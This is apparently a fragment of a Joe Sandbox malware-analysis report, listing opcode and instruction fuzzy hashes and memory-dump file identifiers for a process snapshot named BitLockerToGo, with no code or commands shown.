                                                                            • Opcode ID: d2e4c35d31675d6e1fa08d18a5286ccce933c216dda4ce84708649710e7ae84f
                                                                            • Instruction ID: 27e3844d4ba1c896f8b8267dd14cb4cf791ff99dece38d59eba63b6f2bb77fff
                                                                            • Opcode Fuzzy Hash: d2e4c35d31675d6e1fa08d18a5286ccce933c216dda4ce84708649710e7ae84f
                                                                            • Instruction Fuzzy Hash: 7F900220D48500CA81008E0895404B0E278561F201F183400D008F7011CB54D404562C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 954ece33a410eda268678a975402f4e112e9c9f14bd46a899f1b4fb684d97045
                                                                            • Instruction ID: aecfc5dac79152780b34a8fb92bfdc95fb1003f949280e63fc4d3ae86eb85c79
                                                                            • Opcode Fuzzy Hash: 954ece33a410eda268678a975402f4e112e9c9f14bd46a899f1b4fb684d97045
                                                                            • Instruction Fuzzy Hash: FC900220D885048AD1008E089480474E279621B141F143400D008F3011C650D858954C